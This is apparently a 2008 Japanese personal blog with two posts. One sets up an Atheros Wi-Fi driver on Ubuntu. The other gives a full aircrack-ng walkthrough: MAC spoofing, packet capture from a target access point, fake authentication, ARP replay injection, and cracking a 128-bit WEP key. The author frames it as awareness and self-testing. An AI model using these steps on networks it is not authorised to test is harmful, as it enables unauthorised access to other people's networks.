PCを楽しむ自由人

PCで音・画像・動画を楽しみ 日常の非日常をWalkingで楽しむ バドミントン好き。

Vista Ubuntu 超初心者 - 3 (Madwifi)

2008-11-28 14:55:11 | Weblog

Ubuntu 8.10になって無線LANカード NEC Aterm WL54AG (Atherosチップ) が繋がらなくなったので色々調べて Madwifi もトライするも 「make」 が出来ない 自分の実力不足か Linux Distributor の違いかは不明だけど 再度 Ubuntu本家の説明を忠実にフォローすると成功しましたので報告します。

以前から「lspci」では認識出来るが「iwconfig」では確認出来なかったが認識出来る様になった。

root@ubuntu:~# lspci | grep Atheros
06:00.0 Ethernet controller: Atheros Communications Inc. Atheros AR5001X+ Wireless Network Adapter (rev 01)

root@ubuntu:~# iwconfig
lo             no wireless extensions.
eth0         no wireless extensions.
pan0         no wireless extensions.
wmaster0  no wireless extensions.
wlan1       IEEE 802.11abg  ESSID:""
              Mode:Managed  Frequency:2.437 GHz  Access Point: Not-Associated

WifiDocsDriverAtherosに説明あり (Built-in drivers/modules, tested only on Intrepid)

始めにパッケージマネージャーで linux-backports-modules-intrepid を入れる 無ければRemix CDから取って来る。

後は説明通り 1) 2) と進みますが

「And check each and everyfile for a line that looks like:

blacklist ath5k

And just add a "#" character at the begging of the line, thus commenting it. You might probably find this case on a file named "madwifi". 」

は 結局 「madwifi」ファイルの中の「blacklist ath5k」==>「#blacklist ath5k」に訂正するだけです。

関係無いかも知れませんが相性が悪いとの記事もありましたのでパッケージマネージャーで「madwifi-toos」は一応削除指定しました。

蛇足ですがこのカード 光One  (KDD) の無線LANアクセスポイント(親機)にも装着して使用し 子機にも使用できるカードでチップは Atherosで Aircrack-ng でInjectionも出来ます 参考まで。


Vista Ubuntu 超初心者 - 2 (無線LAN Securityの脆弱性)

2008-11-18 11:05:11 | Weblog
今回のUbuntuの更新でカーネルも 2.6.27.-7generic に更新されたので今まで出来なかった 内蔵無線LANカード Intel(R) Wireless WiFi Link 4965AGN での Injection ができるのではと思いトライしましたが失敗しましたが Buffalo WLI-U2-SG54HP では 解読が早くなって WEP (128bit)  がたったの1分45秒で解読されるので紹介します 目的は無線LAN Securityの脆弱性を認識し 重要なやり取りは有線を使う事 及び無線LANを使わない時は電源を切る等の安全対策をお勧めするのが目的です。

今回行ったのは
システム==>アップデート・マネージャーでプログラム aircrack-ng 1:1.0~rc1-2ubuntu1 のインストール
USB無線LAN BUFFALO WLI-U2-SG54HP ドライバーのインストール この解説 に従えば簡単に出来ますが sudo make の後に sudo make install をお忘れなく。

後はアプリケーション==>端末==>を三つ出してそれぞれ sudo -i  と打ってパスを入れて全て root で操作します。
①パケット収集
****@ubuntu:~$ sudo -i
[sudo]password for *****: *****
root@ubuntu:~# airmon-ng stop wlan1
Interface Chipset Driver
wlan0 iwlagn - [phy0]
wlan1 Ralink USB rt73 (monitor mode disabled)
root@ubuntu:~# macchanger --mac 00:11:22:33:44:66 wlan1 ==>一応自分のMACをフェイクします
Current MAC: **:**:**:**:**:** (unknown)
Faked MAC: 00:11:22:33:44:66 (Cimsys Inc)
root@ubuntu:~# airmon-ng start wlan1

root@ubuntu:~# airodump-ng wlan1 ==>ターゲットのチャンネル番号、MACアドレス、AP名前を調べコピーしたら Ctrl+c (Cancel)
root@ubuntu:~# airodump-ng -c チャンネル番号 -w output --bssid MACアドレス wlan1 == >このまま待つ 

②インジェクション 
root@ubuntu:~# aireplay-ng -1 0 -a MACアドレス -h 00:11:22:33:44:66 -e ネットワーク名 wlan1
07:01:45 Waiting for beacon frame (BSSID: MACアドレス) on channel *
07:01:45 Sending Authentication Request (Open System)
07:01:45 Authentication successful
07:01:45 Sending Association Request
07:01:45 Association successful :-) (AID: 1)
root@ubuntu:~# aireplay-ng -3 -b MACアドレス -h 00:11:22:33:44:66 wlan1 ==>このまま待つ
Injectionが成功すると急激にパケットが集まる

③解析
root@ubuntu:~# aircrack-ng -n 128 -b MACアドレス output-*.cap == > このまま待つ
iVsパケットがある程度 (5,000) 溜まると自動的にパスが解析される。




自分の無線LANの信頼性をテストする事も必要ではないでしょうか?

以上 参考までです。